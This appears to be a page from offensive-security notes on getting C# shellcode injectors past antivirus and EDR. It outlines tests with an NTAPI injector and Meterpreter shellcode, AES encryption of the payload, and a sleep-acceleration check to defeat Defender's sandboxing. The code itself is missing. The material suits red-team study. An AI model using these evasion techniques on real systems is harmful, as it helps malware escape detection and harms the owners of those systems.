Evasion and bypassing detection within C#
Overview
AV and EDR bypass techniques for C# assembly payloads.
Experiment
In this experiment we will be using the NTAPI injector as our baseline.
Using NTAPI Undocumented FunctionsMsfvenom payload
Injector without any shellcode
For our baseline we tested the raw injector code without any shellcode in the payload.
Raw Meterpreter payload shellcode
Running injector with raw Meterpreter shellcode.
Using AES encryption
Encrypting the shellcode using AES
Aes encryptorRunner it twice and defender is not so nice
So interesting, when executing it a second time Defenders behavioral analysis flagged and blocked execution.
Adding a sleep accelerator check to bypass sandboxing seems to do the trick to bypass this a second time.
Time accelerated checksReferences
C# .Net AssemblyLast updated